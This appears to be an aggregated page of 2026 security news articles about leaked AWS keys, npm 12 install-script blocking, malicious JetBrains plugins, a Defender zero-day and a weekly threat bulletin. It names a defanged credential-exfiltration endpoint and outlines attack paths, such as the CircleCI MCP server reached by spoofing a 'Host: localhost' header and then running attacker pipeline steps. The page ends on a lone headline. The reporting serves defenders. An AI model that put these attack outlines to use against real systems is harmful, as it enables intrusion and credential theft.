Search/git
Known CVEs
0
Highest CVSS
In KEV
0
Vendor
git
Connections
117 relationships
Researchers Uncover Thousands of Leaked AWS Keys
Security researchers have claimed that over 9300 leaked AWS keys which surfaced between August 2022 and August 2026 are still active, including hundreds with full admin rights. Truffle Security said its scanners found 64,024 unique AWS key pairs across 431,875 public findings: git history, Hugging Face datasets, Docker images, package registries and CI logs. “We took the 10,616 pairs with complete credentials and re-verified them, then enumerated what each key can tell us about its account: key age, attached policies, budgets, and last month's spend,” the security vendor continued. “No key material is published, and every owner we could identify is being notified.” Of the 10,616 pairs, 88% still authenticate. They include 768 corporate AWS keys which have full admin rights, Truffle Security said. AWS account takeover could allow malicious actors to steal or delete critical cloud data, or even covertly install cryptocurrency mining software to monetize access that way. Only 9.5% of keys had a budget alert set up which would flag this kind of activity, the report claimed. Hugging Face was the largest single source of leaked keys, with 8482 unique live keys discovered across 3394 public datasets – 18% of which had root privileges. For live keys with creation dates, the median age was around five years, although the oldest was over 17 years. “Rotation is the rarer event,” the report continued. “Of the keys where we could enumerate the user's access keys, only 13.7% (398 of 2903) have any newer key alongside the leaked one. The other 86% were never rotated, superseded, or cleaned up.” Steps to Reduce the Risk of Leaked AWS Keys Truffle Security urged organizations and individuals to improve key handling in order to minimize security risk, sharing the following advice: Delete root access keys, checking every account, including personal ones. The report claimed one in six leaked keys had root privileges Sort IAM keys by age using “aws iam list-access-keys” plus a maximum age policy Set a budget alarm to catch crypto-mining early. Even a $10 alert would be better than nothing, given that 90.5% of leaked-key accounts have no alert set up Treat exposed secrets as permanently compromised: 43% of those discovered by the researchers appeared more than once across repos, datasets, and images Watch for the quarantine policy: If AWS attaches “AWSCompromisedKeyQuarantine” to a user, it is saying that the key is public
infosecurity-magazine.comAug 24, 2026extracted
Hundreds of leaked AWS keys give full control over corporate accounts
More than 9,300 Amazon Web Services (AWS) access keys publicly exposed between August 2022 and August 2026 are still active and valid. Truffle Security has been tracking this exposure for the past four years and says that 817 of the exposed keys were linked to companies, 526 of them being AWS root keys. According to the researchers, 242 of the keys are associated with Identity and Access Management (IAM) users with the AdministratorAccess policy. This role has full permissions to create, modify, delete, and view virtually all AWS services and resources within an account. They note that each key of the 768 live keys in the two sets “full control of a company's AWS account.” The company found 431,875 AWS secrets across code repositories, Git history, datasets, Docker images, registries, and CI logs and extracted 64,024 unique AWS keys that corresponded to 50,654 AWS accounts after removing duplicates. However, the subset for which the researchers had complete credentials that could be used for re-verification was 10,616 keys, and 88% of them continued to authenticate as of August 10. Amazon Web Services (AWS) is Amazon’s cloud-computing platform used by companies to host websites and applications, store data, run databases and servers, manage domains, and operate their online infrastructure. Full control of a company’s AWS account could allow an attacker to access, exfiltrate, or wipe cloud-hosted data, take control of servers and applications, and create rogue admin accounts for persistent access Threat actors could also use their access to deploy cryptominers, generating substantial charges for the company. Truffle Security says that only 262 of 2,754 readable accounts had a budget alert set up. Hugging Face, a popular online platform where developers share AI models, datasets, and applications, was the largest single source of leaked AWS keys, accounting for 8,482 unique key exposures. Also, 17.9% of those keys were root, meaning the highest-privileged identity, which isn’t restricted by IAM permissions. Truffle Security found that, for the 2,903 keys with available creation dates, the median age was 1,831 days (about five years), while the oldest had existed for 17.4 years. Only 398 (13.7%) of those entries had a newer access key associated with the same user, suggesting most had never been rotated. To defend against potential abuse, the researchers recommend deleting all root access keys, reviewing IAM credentials by age, rotating or revoking exposed keys, and configuring budget alerts. Also, any credential committed to a public source should be treated as compromised. Truffle Security said its testing was limited to read-only metadata, and that it has notified all identifiable owners of the exposed credentials. Update 22/8 - An Amazon spokesperson sent BleepingComputer the following statement about Truffle Security's findings: “Anytime AWS is aware of exposed keys, we notify the affected customers. We also thoroughly investigate all reports of exposed keys and quickly take any necessary actions, such as applying quarantine policies to minimize risks for customers without disrupting their IT environment. To report any security concern to AWS, including exposed customer credentials, please email [email protected] (PGP key)." "AWS helps customers secure their cloud resources through a shared responsibility model. We encourage all customers to follow security, identity, and compliance best practices. In the event a customer suspects they may have exposed their credentials, they can start by following the steps listed in this post. As always, customers can contact AWS Support with any questions or concerns about the security of their account.” - AWS spokesperson Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comAug 21, 2026extracted
ThreatsDay: Gogs 10.0 RCE, n8n Workflow-to-RCE, $10M Reward, GLM-5.3 AI Exploit, and More
A lot of this week’s trouble starts with something trusted doing exactly what it was allowed to do. Signed drivers get turned against defenses. Legitimate apps help malware blend in. A weak header check opens a path to code execution. Elsewhere, exposed systems, old bugs, odd hiding tricks, and AI-assisted exploit research keep lowering the effort needed to cause damage. Nothing here needs much decoration. The small gaps are doing enough work already. The threats change every week. Subscribe, and we’ll alert you when each new ThreatsDay Bulletin is out. Signed driver abuseIn new research, Check Point has reverse engineered Microsoft Defender's Defender Boot-Time Removal driver ("BTR.sys") and demonstrated that it's possible to repurpose the signed remediation driver as a universal kernel operation engine to bypass endpoint security solutions by exploiting a "golden window" between system start and user mode initialization without having to rely on the bring your own vulnerable driver (BYOVD) method. "Because BTR.sys is a legitimate Microsoft-signed component, signature-based blocking is ineffective," security researcher Jiří Vinopal said. "Furthermore, a well-crafted weaponization tool (like BTR_CLI) intentionally mimics the operational footprint of the legitimate Windows Defender remediation process." $10 million rewardThe U.S. Department of Justice (DoJ) has charged 17 members of the Mabna Institute, an Iran-based company that, since at least 2013, has conducted a coordinated campaign of cyber intrusions into computer systems for 144 U.S.-based universities, 178 foreign universities, at least 42 U.S.-based private sector companies, at least 11 foreign private sector companies, at least five U.S. federal and state government agencies, and at least two non-governmental organizations (NGOs). The Mabna Institute has been accused of stealing more than 31 TB of academic data and intellectual property from these universities, as well as the email accounts of employees at the private sector companies, government agencies, and NGOs. In all, the Mabna Institute targeted more than 100,000 accounts of professors around the world, successfully compromising approximately 8,000 of them. The defendants carried out these intrusions on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC). The Mabna Institute was founded by Gholamreza Rafatnejad and Ehsan Mohammadi around 2013. "The campaign started in approximately 2013, continued through at least December 2017, and broadly targeted all types of academic data and intellectual property from the systems of compromised universities," the DoJ said. "In addition to stealing academic data and login credentials for the benefit of the Government of Iran, the defendants also sold the stolen data through two websites, Megapaper.ir (Megapaper) and Gigapaper.ir (Gigapaper)." The U.S. Department of State is offering a $10 million reward for information about five of the defendants, or associated individuals or entities. "Mabna represents the privatization of state espionage: a contractor selling stolen research to whoever's paying, with the IRGC as an anchor client rather than a sole owner," Shmuel Gihon, Security Research Team Lead of Exposure Management at Check Point, told The Hacker News. "That's the trend to watch: capable, deniable, commercially-run crews doing state-level work at industrial scale, with universities as the perfect target. They offer enormous IP value, thin identity controls, and an open-access culture that phishing exploits directly. We've seen this blurring of cyber-criminal and state-sponsored activity before, but historically it's been more associated with Russian-speaking crews. What this case shows is that Iran and the IRGC are increasingly playing the same game." DLL sideloading campaignA new Grandoreiro malware campaign has been found abusing the legitimate Duplicate Files Finder (DFF) application to run malicious code via DLL sideloading. According to telemetry data from Acronis, Grandoreiro activity remains concentrated in Latin America, with Mexico, Spain, Peru, and Argentina accounting for the lion's share of infections. "The initial sample incorporates extensive anti-analysis functionality, including sandbox detection, virtual machine artifact checks, process blacklisting and environment profiling designed to evade automated analysis systems," Acronis said. "These checks are performed before any attempt to contact the command-and-control (C2) infrastructure, suggesting that avoiding analysis is a high priority for the operators." ClickFix meets BYOVDErrTraffic-generated ClickFix campaigns have been observed attempting to deliver Cruciferra, which, in turn, employs a legitimate but vulnerable driver ("DCRCVDrv.sys") as part of a BYOVD attack to escalate privileges and terminate security processes. ErrTraffic, sold by a threat actor named LenAI, is a malware-as-a-service (MaaS) framework and a traffic distribution system (TDS) that's designed to distribute multiple threats through compromised WordPress websites, ClickFix social engineering, and EtherHiding. In recent months, ErrTraffic has been used to deliver Remus Stealer, Vidar Stealer, Okobot, LegionLoader, OnionDrop-related payloads, and BabaDedaLoader, per WatchGuard. "Victims land on compromised WordPress sites injected with an obfuscated ErrTraffic-generated JavaScript loader," eSentire said. "The loader resolves its C2 domain by querying a Polygon smart contract, then sends a request to the C2 to retrieve the next stage to serve a ClickFix lure." The end goal of the attack is to launch Remus Stealer via process hollowing. Private AI processingOpenAI has announced a privacy-centric safety approach to monitoring model misuse. The company said it's previewing a new service to select customers that it calls Private Safety Processing, which keeps tabs on potential abuse without retaining customer data. "For ZDR deployments, customer content remains on infrastructure the customer controls," OpenAI said. "We are also developing an option in which content is stored on OpenAI infrastructure, encrypted with keys controlled by the customer. In both cases, automated systems can identify potential misuse and return limited safety signals without exposing the underlying prompts or responses to OpenAI personnel." The system clearly takes aim at rival Anthropic, which has a 30-day retention policy for business customers who want to use its Mythos-class models. In a related development, Google has showcased Homomorphic Encryption Intermediate Representation (HEIR), which enables cryptographically secure private AI inference on encrypted inputs. "HEIR (Homomorphic Encryption Intermediate Representation) is an open-source compiler toolchain and development platform for homomorphic encryption," Google said. "In particular, HEIR can convert pre-trained AI models that operate on unencrypted data to operate on encrypted inputs." Guardrail-free AIA new AI-powered service called Kriminal AI offers paying customers a way to get answers about everything, without any of the filters or guardrails that are typically implemented by AI platforms. "Kriminal.AI gives you raw, uncut intelligence — the questions other AIs refuse to touch," the website claims. The service claims to have more than 2,300 users. Kriminal AI follows WormGPT, FraudGPT, and Xanthorox into a market that has expanded quickly to attract users who may be frustrated by safety, security, and ethical safeguards embedded into widely used models. Subscriptions for Kriminal AI start at $12.99/month and go all the way to $99.00/month. The most concerning aspect is that the service is not lurking in the dark web. It's accessible on the clearnet, and comes with a tagline: "No filters. No guardrails. No "I can't help with that." Kriminal.AI gives you raw, uncut intelligence — the questions other AIs refuse to touch." According to ThreatDown, the service appears to make use of Grok for primary inference; Google Cloud and Cloudflare for hosting; Anthropic's Claude for a long-context model layer; Llama routed through OpenRouter for certain specialized tasks; Tavily for live search; NowPayments for cryptocurrency checkout (no KYC included, apparently); and Cloudflare/Let's Encrypt for DNS and TLS. ATT consent changesApple has agreed to make changes to its App Tracking Transparency (ATT) feature in Germany, after the Federal Cartel Office, or FCO, found the feature gave its own apps more favorable consent prompts than those of third-party developers. Apple has four months to implement the changes after. According to a statement issued by Apple, the changes will apply in almost all European Union countries. "The differences between the consent request used for Apple’s own offerings and the consent request predefined by Apple for third-party apps exceeded what could be justified based on differences in types of data processing," FCO said. "The wording, design and selection options of the request used for Apple’s own offerings had the potential to encourage users to give their consent, whereas they had the potential to discourage consent for third-party apps. In addition, third-party apps in some cases had to request consent several times even when users had already given data protection law-compliant consent." Apple was fined €98.6 million (then $116 million) in December 2025 by Italy's antitrust authority after finding that ATT restricted App Store competition. Refrigeration controllers exposedClaroty's Team82 has discovered 23 vulnerabilities in Copeland XWEB Pro controllers, including those that can be chained to bypass security mechanisms and achieve root-level remote code execution. A compromised controller could be used to remotely manipulate refrigeration equipment, including cooling fans and compressors, and conceal the resulting temperature increase while silently allowing the food to spoil. Multiple vulnerabilities have also been disclosed in Danfoss AK-SM 800A refrigeration controllers, including a "hidden 'code-of-the-day' authentication mechanism that could be abused to bypass normal authentication, a command-injection vulnerability leading to remote code execution." A second flaw allowed authenticated users to inject arbitrary Nginx configuration directives, which could be abused to manipulate web traffic and trigger a denial-of-service condition. All the identified vulnerabilities have been fixed by the respective vendors. C2 hidden in whitespaceA hand-written Windows backdoor has been found to store its C2 domain as the number of trailing spaces in a fake desktop.ini file. The 12 KB backdoor was discovered by Gen Digital on a single corporate workstation while hunting for unusual WMI persistence. "The malware was small, had a limited command set and disguised itself as legitimate Realtek software," Gen said. "Its most unusual feature was its configuration: the address of its command-and-control server was not stored as readable text or encrypted data, but encoded in the number of spaces on each line of a Windows 'desktop.ini' file. To a user, and to many automated inspection systems, the file would appear almost empty. To the malware, those spaces spelled out its server address." There is no evidence connecting the backdoor to a known threat actor. The absence of related samples indicates that it may have been a deliberately targeted operation. Maximum-severity RCEA maximum-severity security flaw in Gogs (CVE-2026-52813, CVSS score: 10.0) could be exploited to achieve remote code execution through Git hooks. "Organization names containing path traversal sequences (../) are accepted by Gogs, and repositories under them are written to paths following these path traversals," according to a June 2026 advisory. "This allows storing/retrieving data for repositories at arbitrary locations on the filesystem. By creating a nested structure of Git repositories, one can overwrite the other's hooks configuration to result in Remote Code Execution (RCE)." The issue was addressed in version 0.14.3, alongside patches for CVE-2026-52810 (a logic bug to write on read-only repositories) and GHSA-6vxv-wg6j-5qwp (an XSS flaw in the outdated version of "jsvine/notebookjs" used to render Jupyter notebook files). Aikido Security has been credited with discovering and reporting the flaws. Memory leak via PostScriptDetails have emerged about a now-patched out-of-bounds read flaw in Apple macOS Spotlight (CVE-2026-43774, CVSS score: 5.5) that could be exploited by a malicious app to access sensitive user data. The vulnerability was patched by the iPhone maker in late July 2026. "The vulnerability is in the Spotlight PostScript plugin," Iru researcher Csaba Fitzl said, adding an attacker can use a specially crafted .ps file to trigger the vulnerability. It requires three conditions to be met: (1) The file is at least 4000 bytes, (2) A DSC comment keyword (e.g., %%Creator:) appears somewhere in the first 4000 bytes, and (3) The bytes following the keyword, up to byte 4000, contain no control characters. Unauthenticated CI/CD takeoverA critical security flaw has been disclosed in @circleci/mcp-server-circleci that could result in remote code execution by means of a specially crafted request. "With one well-placed request, an attacker achieves an unauthenticated RCE in your CI/CD pipeline, taking full control of your build secrets and cloud identities," Remedio said. The attack takes advantage of the fact that the Host and Origin headers associated with an HTTP request used to block browser-based attacks can be set by a network-adjacent threat actor. "Send a simple HTTP request that says Host: localhost in the HTTP header with no Origin, and you get right through," Remedio said. "Once in, you can freely communicate with connected tools. Call the "run pipeline" tool, hand it the pipeline configuration you wrote, and add a step to run your commands. CircleCI executes it using the organization's token." The vulnerability has been fixed in version 0.19.2 of the npm package. Workflow-to-RCE chainA critical vulnerability in n8n, an open-source workflow automation platform, can allow an authenticated user with permission to create or modify workflows to exploit a prototype pollution vulnerability in the XML and the GSuiteAdmin nodes and achieve remote code execution on the n8n instance. The issue (CVE-2026-33696, CVSS score: 9.4) has been fixed in versions 2.14.1, 2.13.3, and 1.123.27. Security researcher Simon Koeck, who discovered the Flaw, said the prototype pollution alone is serious enough to crash the entire n8n instance, but can be chained to obtain full code execution and allows the attacker's command to be run as the n8n process user. Cable cut stopped intrusionIn late 2024, reports emerged of a Salt Typhoon campaign that targeted T-Mobile and other major U.S. telecommunications companies as part of a cyber espionage effort to gain access to valuable customer data. Although the activity was caught before the Chinese cyber spies could siphon any data from T-Mobile's networks, the company has now revealed to Bloomberg that its staff spent months looking for suspected intruders without much success, only to eventually trace unusual behavior on one of its systems coming from a Chicago router belonging to a different telecom company. Jeff Simon, T-Mobile's chief information officer, said he and three others drove to the data center that housed the compromised device and "pulled out a pair of scissors" to cut the cable. AI exploitation gainsChinese AI startup Z.ai has released GLM-5.3, a new AI model that it said is better suited for complex coding and long-horizon tasks. "GLM-5.3 is state of the art on CyberGym for vulnerability discovery, and its gains are largest further up the exploitation chain, where it more than doubles GLM-5.2 on exploitation benchmarks," it said. "GLM-5.3 did not simply become better at identifying isolated flaws: it began to reason across multiple stages of exploitation, forming coherent plans for complete exploitation chains," Z.ai said it has been working with several security teams in China to run its open-source models against real-world codebases, identifying 2,436 vulnerabilities across 269 projects, including 1,097 medium-to-high severity issues. "The findings span system kernels, operating systems, browser engines, open-source infrastructure, web applications, and network protocols," it said. "Many had remained unnoticed for years or even decades, with the oldest dating back roughly 40 years." Despite these advances, benchmarks show that GLM-5.3 lags behind Anthropic Mythos 5 in converting discovered flaws into working attacks. The useful part of weeks like this is that the attacks rarely begin with magic. They begin with trust, exposure, weak assumptions, and things nobody thought worth abusing. That leaves plenty to fix. Tighten what gets trusted, question the defaults, and keep looking at the boring edges. Attackers clearly are.
thehackernews.comAug 20, 2026extracted
Microsoft confirms GitHub is down worldwide
GitHub is down for some users as a widespread outage is causing errors across the website, API, Actions, Pull Requests, and several other services. GitHub confirmed the outage at 9:40 AM EDT on August 17, 2026, when it said it was investigating reports of performance problems affecting some of its services. The problems quickly spread across several parts of GitHub that developers rely on, including API Requests, Actions, Webhooks, Issues, and Pull Requests. According to GitHub's status page, the company is seeing error rates of around 20% across its web experience and API traffic. The outage appears to be even worse for some repository downloads GitHub says archive downloads and raw repository content downloads are experiencing error rates of approximately 50%. Likewise, authentication-related services are also having problems, with SAML and OIDC authentication, SCIM, and Team Sync affected by the incident. Some users are running into server errors when trying to access GitHub, while others are reporting problems loading commits, repositories, and Pull Request pages. GitHub Actions is also experiencing degraded performance, which means the outage can affect automated builds, tests, deployments, and other workflows that depend on GitHub's CI/CD platform. At 10:31 AM EDT, GitHub confirmed that Copilot was also experiencing degraded availability, expanding the outage to its AI coding services. Git Operations, Packages, Pages, and Codespaces are currently listed as operational, but several important parts of GitHub remain degraded. GitHub has not disclosed what caused the outage and says its investigation is ongoing. This is a developing story... Update 1: At 11:42 AM EDT, GitHub said it is now performing mitigations. However, error rates remain around 20% for web experiences and API traffic, while archive and raw repository content downloads continue to see approximately 50% error rates. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comAug 17, 2026extracted
Malicious JetBrains Marketplace plugins steal AI API keys from developers
At least 15 malicious plugins found on the JetBrains Marketplace were designed to steal AI API keys from developers. The campaign, discovered by Aikido Security, includes plugins that act as AI coding assistants, code-review tools, and Git utilities powered by popular AI services such as OpenAI, DeepSeek, and SiliconFlow. "We detected a coordinated malware campaign on the JetBrains Marketplace," warns Aikido. "At least 15 IDE plugins, published under seven vendor accounts, share the same hidden behavior. Each one exfiltrates the AI provider API key that you stored into its settings, and together they have been installed close to 70,000 times." According to Aikido, the malicious plugins were first published in October 2025, with new plugins continuing to be published as recently as June 10, 2026. The researchers say the plugins function as advertised, but secretly transmit AI API keys entered by users into the plugin settings back to the attackers. According to the report, the theft occurs when a user clicks "Apply" after entering an API key, causing the credential to be sent to a hardcoded server at 39.107.60[.]51 over HTTP at this URL: hxxp://39.107.60[.]51/api/software/key The researchers found that all 15 plugins share similar code that were submitted as different Marketplace plugins. Aikido also discovered functionality that allows the remote server to provide AI API keys to paid users. While it is unclear where these API keys are coming from, Aikido theorizes that the plugin operators may be harvesting credentials from the free users and then providing them to the paid users. "The plugins also run a paid tier. After a user pays a small fee through the donation wall built into the plugin, the server sends an API key back down to the client, and the plugin starts using that key for its model calls instead of your own, which is bizarre, since no legitimate operator would simply hand a user a working and unrestricted key to a paid AI provider," says Aikido. BleepingComputer downloaded and analyzed the latest version of the DeepSeek AI Assist plugin (plugin ID: ord.cp.code.ai.kit) and independently confirmed that it still contains the credential theft code described in Aikido's report. At the time of writing, the plugin remained available for download through the JetBrains Marketplace. The campaign plugins discovered by Aikido are: DeepSeek Junit Test (org.sm.yms.toolkit) DeepSeek Git Commit (com.json.simple.kit) DeepSeek FindBugs (org.bug.find.tools) DeepSeek AI Chat (org.translate.ai.simple) DeepSeek Dev AI (com.yy.test.ai.simple) DeepSeek AI Coding (com.dev.ai.toolkit) AI FindBugs (com.json.view.simple) AI Git Commitor (com.my.git.ai.kit) AI Coder Review (org.check.ai.ds) DeepSeek Coder AI (com.review.tool.code) AI Coder Assistant (org.code.assist.dev.tool) DeepSeek Code Review (com.coder.ai.dpt) CodeGPT AI Assistant (com.my.code.tools) DeepSeek AI Assist (ord.cp.code.ai.kit) Coding Simple Tool (com.dp.git.ai.tool) The two most downloaded plugins are DeepSeek AI Assist (27,727 downloads) and CodeGPT AI Assistant (25,571 downloads). However, the researchers warn that download counts can be manipulated and should not necessarily be treated as unique installations. While malicious packages are commonly discovered on repositories such as npm and PyPI, reports of credential-stealing plugins distributed through the JetBrains Marketplace are far less common. BleepingComputer contacted JetBrains about the malicious plugins, but has not received a response as of publication. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comJun 16, 2026extracted
NPM 12 Will Change Script Execution Behavior to Prevent Supply Chain Attacks
In response to a recent wave of supply chain attacks targeting the NPM ecosystem, GitHub announced that scripts from dependencies will no longer be executed by default. Multiple major incidents that occurred over the past several months, mainly associated with TeamPCP and the Shai-Hulud self-replicating worm, have been abusing the default, automatic execution of scripts from dependencies during npm install to infect thousands of developers with malware. To better protect users, starting with NPM version 12, which is expected to arrive in July, script execution will be blocked by default, GitHub announced. “npm install will no longer execute preinstall, install, or postinstall scripts from dependencies unless they are explicitly allowed in your project,” the code-sharing platform explains. The change will also impact native node-gyp builds, such as packages that have a binding.gyp and no explicit install script, as well as prepare scripts from git, file, and link dependencies. The recent Shai-Hulud Miasma attacks relied on a weaponized binding.gyp file. To check how the upcoming change will impact their projects, developers can run npm approve-scripts –allow-scripts-pending, and allow the packages they trust and block the rest, to obtain an allowlist that is written to package.json. Once the JSON is committed, developers using NPM version 11.16.0 or above will receive warnings if their install routine executes scripts. Additionally, GitHub explains, Git dependencies (direct or transitive) will no longer be resolved at npm install, unless explicitly allowed. “This closes a code-execution path where a Git dependency’s .npmrc could override the Git executable, even with –ignore-scripts,” the platform notes. Similarly, dependencies from remote URLs will no longer be resolved in NPM version 12. This includes HTTPS tarballs (direct or transitive), but developers can allow them via the –allow-remote flag, which has been available since version 11.15.0. “Upgrade to NPM 11.16.0 or later, run your normal install, and review the warnings. Use npm approve-scripts –allow-scripts-pending to see which packages have scripts, approve the ones you trust, and commit the updated package.json. After that, only the scripts you approved keep running once you upgrade,” GitHub notes. Related: Over 5,500 GitHub Repositories Infected in ‘Megalodon’ Supply Chain Attack Related: Supply Chain Attack Hits 32 Red Hat NPM Packages Related: GitHub Confirms Hack Impacting 3,800 Internal Repositories Related: Grafana Says Codebase and Other Data Stolen via TanStack Supply Chain Attack
securityweek.comJun 13, 2026extracted
GitHub to Update npm to Thwart Software Supply Chain Attacks
NPM has announced new version (v12) of the npm package manager in a bid to prevent software supply chain attacks. In a blog post published on June 9, a team of npm developers at Microsoft-owned GitHub announced three security-focused breaking changes that will transition the package manager from a model of implicit trust to explicit opt-in. Available from July 2026, these changes represent a fundamental shift in how the ecosystem handles dependencies. In npm v12, three historically permissive defaults will be flipped: Blocked install scripts: Running npm install will no longer automatically execute background scripts (such as preinstall, install, postinstall or native C/C++ builds like node-gyp rebuild), preventing malicious code from immediately executing during installation Blocked Git dependencies: Resolving dependencies directly from custom Git URLs will be blocked by default to prevent attackers from using custom Git configurations to bypass script restrictions Blocked remote URLs: Sourcing packages directly from external URLs or HTTPS tarballs instead of official registries will be forbidden by default unless explicitly permitted To prepare for this transition, developers can already upgrade to the current npm version 11.16.0 or newer to receive optional warnings. They can also use the new npm approve-scripts command to audit their dependencies, identify blocked scripts and build a local policy allowlist directly in their package.json file. Closing One Door May Open Others, Security Experts Caution Isaac Evans, founder and CEO of Semgrep, supported this shift, and noted that the economic realities of software supply chain attacks demand structural defenses rather than relying on developers to individually catch every threat. "It's become clear that the economics of supply chain attacks have shifted. Worms like Miasma do not need a perfect hit rate. They are cheap to modify, cheap to rerun, and easier to extend now that parts of the playbook have been exposed,” he said. “That makes stronger defaults around install scripts and non-registry dependencies a meaningful step." He also noted that the overall response is moving toward structural guardrails instead of asking every developer to catch every bad package in time. However, Evans warned that as public package managers close these doors, attackers will pivot to private corporate repositories like Artifactory and Nexus. "If npm and PyPI close off easier paths, attackers will look for the next trusted layer," he said. Vulnerability researcher Paul McCarty, also known as 6mile, offered a more cautious perspective, warning that while the updates address long-standing flaws, they could also border on security theatre if they lead to developer friction. In an analysis published on his website, Open Source Malware, on June 10, McCarty commended GitHub for retiring these three highly vulnerable defaults but said he remains concerned about the timeline for widespread adoption. Furthermore, he added that because build completion is a developer's primary objective, many will simply blind-approve blocked scripts to bypass the warnings. "When the choice is 'this builds' and 'this is less prone to malware', the former will always win,” McCarty cautioned. He also highlighted an unintended consequence for security researchers, warning that benign package maintainers may resort to suspicious-looking workarounds to bypass the new blocks. "The benign and the malicious converge on the same suspicious-looking pattern. We end up triaging a flood of weird-but-fine packages to find the weird-and-actually-bad ones and the bad ones get better cover precisely because so much legitimate behavior now looks the same way,” he warned.
infosecurity-magazine.comJun 12, 2026extracted
GitHub to Disable npm Install Scripts by Default to Stop Supply Chain Attacks
GitHub has announced what it said are "breaking changes" coming to npm version 12, one of which turns off install scripts by default to combat software supply chain threats. The changes aim to combat attack techniques that abuse the "npm install" command to trigger the execution of malicious code using npm lifecycle hooks. "Npm install" is used to download and install all the necessary dependencies for a Node.js project. Version 12 is scheduled for release next month. Describing install-time lifecycle scripts as the "single largest code-execution surface in the npm ecosystem," GitHub said the "npm install" command runs scripts from every transitive dependency, as a result of which a single compromised package anywhere in the dependency tree can run arbitrary code on a developer machine or CI runner. By blocking such behaviours, the idea is to require explicit user approval before code execution is initiated automatically during "npm install" as opposed to being trusted by default. "Making script execution opt-in closes that path while keeping it one command away for the packages you trust," GitHub said. The changes are listed below - npm install will no longer execute preinstall, install, or postinstall scripts from dependencies unless they are explicitly allowed in the project. npm install will no longer resolve Git dependencies, either direct or transitive, unless explicitly allowed via --allow-git. npm install will no longer resolve dependencies from remote URLs, such as https tarballs, unless explicitly allowed via --allow-remote. "This includes native node-gyp builds (i.e., a package with a binding.gyp and no explicit install script still gets blocked, because npm runs an implicit node-gyp rebuild for it)," the Microsoft-owned subsidiary said about changes to the default "allowScripts" behavior. "prepare scripts from git, file, and link dependencies are blocked the same way." By defaulting "--allow-git" to "none," the setting closes out a code execution path where a Git dependency's .npmrc configuration file used could override the Git executable, even with --ignore-scripts, a flag that prevents packages specified in a package.json file from automatically running built-in lifecycle scripts during the installation process. GitHub recommends that developers prepare for these changes by upgrading to npm 11.16.0 or newer, running the normal install, and reviewing the warnings displayed. "Use npm approve-scripts --allow-scripts-pending to see which packages have scripts, approve the ones you trust, and commit the updated package.json," it added. "After that, only the scripts you approved keep running once you upgrade. Anything you leave unapproved will stop." Earlier this year, npm also introduced "min-release-age," a setting that tells npm to reject any package version published less than a specified number of days as a safeguard against newly published malicious packages.
thehackernews.comJun 11, 2026extracted
Microsoft Defender 'RoguePlanet' zero-day grants SYSTEM privileges
Update: Added statement from Microsoft to the end of this article. A security researcher has released a new Microsoft Defender zero-day exploit named "RoguePlanet" just hours after Microsoft fixed two previously disclosed flaws during June 2026 Patch Tuesday. The researcher, known as Nightmare Eclipse, says the new vulnerability affects fully patched Windows 10 and Windows 11 devices, allowing attackers to spawn a command prompt with SYSTEM privileges via a Microsoft Defender race condition vulnerability. The researcher shared a proof-of-concept exploit on Tuesday afternoon in a self-hosted Git repository after saying that GitHub and GitLab repositories hosting their exploits had previously been removed by Microsoft. "The exploit is a race condition, so it's a hit or miss. I have managed to get a 100% success rate on some machines while it struggled to work on others," Nightmare Eclipse wrote in the repository. The flaw was reportedly tested against Windows 11 Official and Canary builds, as well as Windows 10 systems with the June 2026 security updates installed. When successful, a Windows command prompt will be spawned with SYSTEM privileges. Cybersecurity firm ThreatLocker told BleepingComputer that they successfully reproduced the flaw in their testing and confirmed the exploit worked against fully patched Windows 11 systems with KB5094126 installed, and shared a video demonstrating it. "Our initial analysis confirms that the RoguePlanet exploit is viable and performs as described. Organizations using application allowlisting can prevent the exploit from executing, providing an effective layer of protection against this attack," Danny Jenkins, CEO of ThreatLocker, told BleepingComputer. According to Nightmare Eclipse, RoguePlanet was originally developed as a remote code execution vulnerability that exploited Microsoft Defender's handling of files hosted on remote SMB shares. "In initial development, it was confirmed that this vulnerability was a remote code execution," the researcher explained in a blog post. "It required an attacker to coerce a victim to open a .vhd(x) in a remote SMB server, succesful exploitation resulted in defender overwriting its own files and obviously the end outcome was an RCE." The researcher says another attack scenario could lead to remote code execution simply by coercing a victim into opening an SMB share if symlink evaluation settings were enabled. However, the researcher claims Microsoft silently hardened Defender in mid-May by patching "mpengine!SysIO*" API, which blocked junction attacks. "Rewriting RoguePlanet to make it functional again drained my soul and I couldn't complete the other scenarios and for now it remains unclear if RoguePlanet is limited to LPE or there is some sort of way to turn it into an RCE," the researcher wrote. The release is part of an ongoing dispute between Nightmare Eclipse and Microsoft over the company's vulnerability disclosure and bug bounty practices. Over the past several months, the researcher has publicly released multiple Windows zero-days, including the BlueHammer, RedSun, GreenPlasma, and YellowKey flaws. Some of the zero-days targeted Microsoft Defender, while others targeted BitLocker and Windows components. Microsoft fixed the GreenPlasma and YellowKey flaws today as part of the June 2026 Patch Tuesday updates. Microsoft previously reacted to the disclosures with warnings that it would work with law enforcement when people engage in "malicious activity causing real harm to our customers," leading many in the cybersecurity community to think Microsoft was threatening the researcher. Nightmare Eclipse claims Microsoft repeatedly targeted and removed previous repositories hosted on GitHub and GitLab, prompting the creation of a self-hosted code platform at projectnightcrawler.dev. BleepingComputer has contacted Microsoft about the new zero-day and will update the story if we receive a statement. Update 6/10/26: After publishing this story, Microsoft told BleepingComputer that they are aware of the reported vulnerability and are investigating it. “Microsoft is aware of the reported vulnerability and is actively investigating the validity and potential applicability of these claims. Microsoft is committed to investigating security issues and updating impacted products to protect customers as soon as possible," a Microsoft spokesperson told BleepingComputer. "Importantly, we support coordinated vulnerability disclosure, an industry standard that protects customers and supports the research community by ensuring their findings are thoroughly investigated and addressed before being made public." Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comJun 9, 2026extracted
AI-built ransomware toolkit automates EDR evasion, AD discovery
